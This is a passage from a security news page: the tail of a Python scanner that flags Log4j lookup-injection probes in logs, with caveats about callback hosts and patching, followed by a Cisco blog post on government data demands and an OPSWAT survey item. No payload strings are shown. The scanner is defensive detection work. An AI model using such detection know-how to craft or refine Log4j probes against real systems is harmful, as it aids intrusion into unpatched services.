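def scan_log(text: str) -> List[dict]:
    """Scan every line of a log and return the findings in order."""
    return [f for f in (scan_line(l) for l in text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Two caveats a practitioner should keep in mind. First, this kind of matching only tells you that someone probed; as the article notes, scans may come from researchers as well as attackers, so the callback host is what to pivot on when deciding whether to block or investigate. Second, the lookup grammar is richer than the two unwrapping rules shown here, so log inspection is a detection aid, not a substitute for upgrading Log4j on the affected services.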


Cisco’s 7 Guiding Principles of Government Data Demands


At Cisco, we empower our customers to control their data. Protecting the privacy, integrity, and confidentiality of data in our possession is of utmost importance. In a world of advancing cyberthreats, expanding extraterritorial legislation, and growing concerns for data localization, we understand technology companies have an outsized responsibility to ensure customers have the power to make important decisions about their data.

Like all global technology companies, Cisco sometimes receives demands from law enforcement, intelligence agencies, or governments requesting access to data related to an ongoing investigation. When this happens, Cisco follows a strict set of procedures to ensure that data disclosures are minimized and controlled, and that access to our solutions and services remains free from unlawful intrusion.

Our Principled Approach drives our policies and procedures in how we operate as a company when receiving government demands for data: 

Principle 1: We believe governments, including law enforcement and national security agencies, should go directly to our customers to gain access to data regarding those entities, their employees, and users. We will refer the government to the relevant customer before disclosing any data in Cisco’s possession. We will only consider disclosing data directly to the government in scenarios where the customer does not have the relevant corresponding data, where the customer has requested that we disclose the data to the government, or where the government has confirmed that it cannot seek the requested information from the customer.

Principle 2: Cisco will provide data in response to a demand only if the requesting government has demonstrated appropriate lawful authority to require us to provide the data. Where demands are not accompanied by valid legal process, Cisco will challenge or reject the request. 

Principle 3: Cisco will carefully review every government demand to ensure legal validity, and we will narrowly interpret demands to produce the least data necessary to comply. Cisco will challenge any government demand that raises human rights concerns. Cisco’s actions will be guided by our Global Human Rights Policy.

Principle 4: Unless prohibited by applicable law, Cisco will notify the customer that its data has been requested prior to producing any data to government, so that the customer may attempt to limit or prevent disclosure.

Principle 5: Cisco will only make an exception to our customer notification commitments in emergency circumstances where disclosure to the government will prevent imminent death or serious physical harm to an individual. Where not prohibited by applicable law, we will subsequently notify the customer if such an exception has been made. Emergency demands will be included in our semiannual Transparency Report.

Principle 6: Where demands that prohibit notification to the customer are excessive in duration (over one year in length), or are overly broad in scope, Cisco will challenge the demand to protect our customer’s interests.

Principle 7: Where compliance with a valid government demand would put Cisco in potential breach of applicable data protection and/or privacy-related laws in another country that has jurisdiction over the data, we will challenge the demand and invoke mutual legal assistance mechanisms, where appropriate.

We are committed to constantly reassessing these principles to ensure they align with growing international privacy regulations and continuously exceed our customers’ expectations.

Beyond our principles, Cisco actively engages in advocacy work in topics of government surveillance reform and digital sovereignty to help encourage regulations that are consistent with Cisco’s principled approach. We are members of BSA The Software Alliance, Information Technology Industry Council (ITI), and the US ASEAN Business Council to address these issues across the globe.

Article sourced from Cisco Blog


Report: 93% of orgs are challenged by malware analysis


A new report by OPSWAT found that, despite malware analysis becoming a mature business function, a glaring 93% of organizations are challenged by malware analysis.

Among the top malware analysis challenges are lack of automation (58%), lack of integration (56%), and lack of team experience in using tools (45%). These ultimately result in poor data outcomes and an inefficient process that can create a bottleneck — and when responding to an attack, time is of the essence.

Most alarming is that, because of these combined challenges, only 3% of organizations are able to fully investigate and resolve malicious files through malware analysis, and one in five (22%) resolve less than half of their malicious files. 

As organizations grapple with Advanced Persistent Threats (APTs), targeted attacks, and highly motivated ransomware groups, malware analysis has become a critical business process in order to proactively consume threat intelligence to better understand their adversaries and hunt for threats to stay ahead of attackers.

The report identifies the attitudes, statistics, trends and best practices to address file-based threats and to help organizations understand the greatest challenges facing malware analysis today so they can make better informed decisions and improve their own programs. 

Malware analysis is a time-consuming manual process, made all the more complex by tools that are not integrated. Such monotonous workflows can become a source of employee burnout, or introduce human error into the process, putting a premium on high-performance, accurate solutions.

The technical limitations of malware analysis and the struggle to find experienced malware analysts are two sides of the same coin, and if malware analysis is to continue maturing as a business function, then organizations need to be aware of their current limitations and begin investing in more automated, integrated, and accurate solutions — resulting in a stronger security posture and higher performing staff.

The report surveyed 309 qualified participants in 17+ industries within critical infrastructure sectors.

Read the full report by OPSWAT.
